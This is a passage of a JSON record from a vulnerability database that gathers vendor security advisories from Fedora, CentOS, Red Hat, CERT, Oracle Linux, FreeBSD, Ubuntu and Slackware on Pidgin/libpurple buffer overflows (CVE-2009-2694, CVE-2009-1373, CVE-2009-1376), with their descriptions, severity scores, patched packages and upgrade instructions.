"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "description": "libnice is an implementation of the IETF's draft Interactive Connectivity Establishment standard (ICE). ICE is useful for applications that want to establish peer-to-peer UDP data streams. It automates the process of traver sing NATs and provides security against some attacks. Existing standards that use ICE include the Session Initiation Protocol (SIP) and Jingle, XMPP extension for audio/video calls. ", "modified": "2009-08-20T21:02:03", "published": "2009-08-20T21:02:03", "id": "FEDORA:0922810F888", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: libnice-0.0.9-1.fc11", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "description": "farsight2 is a collection of GStreamer modules and libraries for videoconferencing. ", "modified": "2009-08-20T21:02:03", "published": "2009-08-20T21:02:03", "id": "FEDORA:0BBD210F88B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: farsight2-0.0.14-1.fc11", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "description": "Pidgin allows you to talk to anyone using a variety of messaging protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu, ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and Zephyr. These protocols are implemented using a modular, easy to use design. To use a protocol, just add an account using the account editor. Pidgin supports many common features of other clients, as well as many unique features, such as perl scripting, TCL scripting and C plugins. Pidgin is not affiliated with or endorsed by America Online, Inc., Microsoft Corporation, Yahoo! Inc., or ICQ Inc. ", "modified": "2009-08-20T20:58:45", "published": "2009-08-20T20:58:45", "id": "FEDORA:DF27810F882", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: pidgin-2.6.0-1.fc10", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "description": "gupnp-igd is a library to handle UPnP IGD port mapping. ", "modified": "2009-08-20T21:02:03", "published": "2009-08-20T21:02:03", "id": "FEDORA:0213210F80B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: gupnp-igd-0.1.3-3.fc11", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "description": "Pidgin allows you to talk to anyone using a variety of messaging protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu, ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and Zephyr. These protocols are implemented using a modular, easy to use design. To use a protocol, just add an account using the account editor. Pidgin supports many common features of other clients, as well as many unique features, such as perl scripting, TCL scripting and C plugins. Pidgin is not affiliated with or endorsed by America Online, Inc., Microsoft Corporation, Yahoo! Inc., or ICQ Inc. ", "modified": "2009-08-22T00:55:51", "published": "2009-08-22T00:55:51", "id": "FEDORA:BEBF010F882", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: pidgin-2.6.1-1.fc10", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:26:28", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1218\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in Pidgin's\nMSN protocol handler. If a user received a malicious MSN message, it was\npossible to execute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from\nusers on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve\nthis issue. Pidgin must be restarted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/028137.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/028138.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/028139.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/028140.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1218.html", "edition": 3, "modified": "2009-08-19T09:20:15", "published": "2009-08-18T19:24:05", "href": "http://lists.centos.org/pipermail/centos-announce/2009-August/028137.html", "id": "CESA-2009:1218", "title": "finch, libpurple, pidgin security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:25:56", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1059\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to this update package, which contains\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/027927.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/027928.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/027971.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/027973.html\n\n**Affected packages:**\npidgin\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1059.html", "edition": 3, "modified": "2009-05-25T15:35:42", "published": "2009-05-22T14:04:17", "href": "http://lists.centos.org/pipermail/centos-announce/2009-May/027927.html", "id": "CESA-2009:1059", "title": "pidgin security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:22", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in Pidgin's\nMSN protocol handler. If a user received a malicious MSN message, it was\npossible to execute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from\nusers on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve\nthis issue. Pidgin must be restarted for this update to take effect.", "modified": "2018-05-26T04:26:17", "published": "2009-08-18T04:00:00", "id": "RHSA-2009:1218", "href": "https://access.redhat.com/errata/RHSA-2009:1218", "type": "redhat", "title": "(RHSA-2009:1218) Critical: pidgin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:35:42", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1373", "CVE-2009-1376"], "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to this update package, which contains\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.", "modified": "2018-05-26T04:26:17", "published": "2009-05-22T04:00:00", "id": "RHSA-2009:1059", "href": "https://access.redhat.com/errata/RHSA-2009:1059", "type": "redhat", "title": "(RHSA-2009:1059) Important: pidgin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:42:12", "bulletinFamily": "info", "cvelist": ["CVE-2009-2694"], "description": "### Overview \n\nThe Libpurple instant messenger library contains a vulnerability that may allow an attacker to execute arbitrary code.\n\n### Description \n\n[Libpurple](<http://developer.pidgin.im/wiki/WhatIsLibpurple>) is an instant messenger (IM) library that is used by various programs to connect to multiple networks. Libpurple contains a buffer overflow vulnerability that can be triggered by sending specially crafted [MSNSLP](<http://msnpiki.msnfanatic.com/index.php/MSNC:MSNSLP>) messages to a program that is using an affected version of the library.\n\nFor more technical details, see CORE Advisory [CORE-2009-0727](<http://www.coresecurity.com/content/libpurple-arbitrary-write#lref.4>). \n \n--- \n \n### Impact \n\nAn attacker may be able to execute arbitrary code or cause an IM program to crash. \n \n--- \n \n### Solution \n\n**Upgrade** \nInstant messenger programs may distribute Libpurple and will provide an updated version to their users as a security update. See the systems affected portion of this document for a partial list of affected IM clients. Users who compile Libpurple or IM programs should see the Libpurple [site](<http://developer.pidgin.im/>) or their operating system vendor for updated software. \n \n--- \n \n \n**Restrict Access** \n \nThe most likely attack vector for this issue would be via the MSN IM network. Administrators may be able to temporarily mitigate this issue by blocking access to the MSN IM network. This workaround is not likely to be totally effective. \n \n--- \n \n### Vendor Information\n\n582244\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Pidgin Affected\n\nUpdated: August 21, 2009 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Vendor References\n\n * <http://pidgin.im/news/security/?id=34>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 0 | AV:--/AC:--/Au:--/C:--/I:--/A:-- \nTemporal | 0 | E:Not Defined (ND)/RL:Not Defined (ND)/RC:Not Defined (ND) \nEnvironmental | 0 | CDP:Not Defined (ND)/TD:Not Defined (ND)/CR:Not Defined (ND)/IR:Not Defined (ND)/AR:Not Defined (ND) \n \n \n\n\n### References \n\n * <http://pidgin.im/news/security/?id=34>\n * <http://developer.pidgin.im/wiki/WhatIsLibpurple>\n * <http://www.coresecurity.com/content/libpurple-arbitrary-write#lref.4>\n * <http://msnpiki.msnfanatic.com/index.php/MSNC:MSNSLP>\n * <http://supportwiki.cisco.com/ViewWiki/index.php/How_to_configure_the_PIX_500_Series_Firewall_with_software_version_6.x_in_order_to_block_the_MSN_messenger_with_the_access-list_command>\n\n### Acknowledgements\n\nInformation from CORE Advisory CORE-2009-0727 was used in this report. \n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2009-2694](<http://web.nvd.nist.gov/vuln/detail/CVE-2009-2694>) \n---|--- \n**Severity Metric:** | 10.19 \n**Date Public:** | 2009-08-18 \n**Date First Published:** | 2009-08-21 \n**Date Last Updated: ** | 2009-08-21 18:59 UTC \n**Document Revision: ** | 12 \n", "modified": "2009-08-21T18:59:00", "published": "2009-08-21T00:00:00", "id": "VU:582244", "href": "https://www.kb.cert.org/vuls/id/582244", "type": "cert", "title": "Libpurple buffer overflow vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:56", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "description": " \n[2.5.9-1]\r\n- CVE-2009-2694 ", "modified": "2009-08-18T00:00:00", "published": "2009-08-18T00:00:00", "id": "ELSA-2009-1218", "href": "http://linux.oracle.com/errata/ELSA-2009-1218.html", "type": "oraclelinux", "title": "pidgin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:36", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "description": "[1.5.1-3]\n- CVE-2009-1373\n- CVE-2009-1376 ", "modified": "2009-05-22T00:00:00", "published": "2009-05-22T00:00:00", "id": "ELSA-2009-1059", "href": "http://linux.oracle.com/errata/ELSA-2009-1059.html", "type": "oraclelinux", "title": "pidgin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:12", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "description": "\nSecunia reports:\n\nA vulnerability has been reported in Pidgin, which can be\n\t exploited by malicious people to potentially compromise a user's\n\t system.\nThe vulnerability is caused due to an error in the\n\t \"msn_slplink_process_msg()\" function when processing MSN SLP\n\t messages and can be exploited to corrupt memory.\nSuccessful exploitation may allow execution of arbitrary\n\t code.\nThe vulnerability is reported in versions 2.5.8 and prior.\n\t Other versions may also be affected.\n\n", "edition": 4, "modified": "2009-08-18T00:00:00", "published": "2009-08-18T00:00:00", "id": "59E7AF2D-8DB7-11DE-883B-001E3300A30D", "href": "https://vuxml.freebsd.org/freebsd/59e7af2d-8db7-11de-883b-001e3300a30d.html", "title": "pidgin -- MSN overflow parsing SLP messages", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-09T00:27:25", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "description": "Federico Muttis discovered that Pidgin did not properly handle certain \nmalformed messages in the MSN protocol handler. A remote attacker could \nsend a specially crafted message and possibly execute arbitrary code with \nuser privileges.", "edition": 5, "modified": "2009-08-20T00:00:00", "published": "2009-08-20T00:00:00", "id": "USN-820-1", "href": "https://ubuntu.com/security/notices/USN-820-1", "title": "Pidgin vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:22:48", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "description": "It was discovered that Gaim did not properly handle certain malformed \nmessages when sending a file using the XMPP protocol handler. If a user \nwere tricked into sending a file, a remote attacker could send a specially \ncrafted response and cause Gaim to crash, or possibly execute arbitrary \ncode with user privileges. (CVE-2009-1373)\n\nIt was discovered that Gaim did not properly handle certain malformed \nmessages in the MSN protocol handler. A remote attacker could send a \nspecially crafted message and possibly execute arbitrary code with user \nprivileges. (CVE-2009-1376)", "edition": 5, "modified": "2009-06-03T00:00:00", "published": "2009-06-03T00:00:00", "id": "USN-781-2", "href": "https://ubuntu.com/security/notices/USN-781-2", "title": "Gaim vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2019-05-30T07:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, and -current\nto fix a security issue.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/pidgin-2.5.9-i486-1_slack12.2.tgz:\n This update fixes a bug in Pidgin's MSN protocol implementation that can\n allow a remote attacker to send a malicious MSN message to a Pidgin user,\n which will possibly cause arbitrary code to be executed as that user.\n This issue was discovered by Federico Muttis of Core Security Technologies.\n For more information, see:\n http://www.coresecurity.com/content/libpurple-arbitrary-write\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.5.9-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.5.9-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.5.9-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.5.9-i486-1.txz\n\nUpdated package for Slackware64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.5.9-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n3ce9ef2fb489919027f5fd48aecfe16e pidgin-2.5.9-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nab5b36db9e7f97b845672d030b64b999 pidgin-2.5.9-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\nbefadfc8dde193789bcee91f7f33f8ba pidgin-2.5.9-i486-1_slack12.2.tgz\n\nSlackware -current package:\n4bc5945ad08e4fa5ebefcd1c5fc9c932 pidgin-2.5.9-i486-1.txz\n\nSlackware64 -current package:\n0a18668ccb5cd223e56789c871997769 pidgin-2.5.9-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.5.9-i486-1_slack12.2.tgz", "modified": "2009-08-19T18:56:17", "published": "2009-08-19T18:56:17", "id": "SSA-2009-231-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.423964", "type": "slackware", "title": "pidgin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
